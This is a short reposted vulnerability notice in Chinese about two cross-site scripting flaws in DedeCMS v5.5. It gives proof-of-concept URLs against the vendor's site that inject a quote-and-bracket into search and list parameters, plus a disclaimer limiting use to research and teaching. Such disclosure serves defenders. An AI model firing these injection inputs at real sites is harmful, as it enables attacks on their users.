dedecms织梦 v5.5 两处跨站漏洞
程序员文章站
2022-04-07 18:03:51
影响版本: dedecms织梦5.5 漏洞描述: demo1:http://www.dedecms.com/plus/search.php?keyword=%22>&searchtype=titlekeyword&channeltype=0&orderby=... 11-03-11...
影响版本:
dedecms织梦5.5
漏洞描述:
demo1:http://www.dedecms.com/plus/search.php?keyword=%22>&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=0&totalresult=&pageno=2demo2:http://www.dedecms.com/plus/list.php?tid=6&totalresult=&nativeplace=0&infotype=0&keyword=&orderby=hot&pageno=2
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
demo1:http://www.dedecms.com/plus/search.php?keyword=%22>&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=0&totalresult=&pageno=2demo2:http://www.dedecms.com/plus/list.php?tid=6&totalresult=&nativeplace=0&infotype=0&keyword=&orderby=hot&pageno=2
上一篇: 金山毒霸多个sql注入及XSS漏洞和修复
下一篇: lambda表达式实例(续)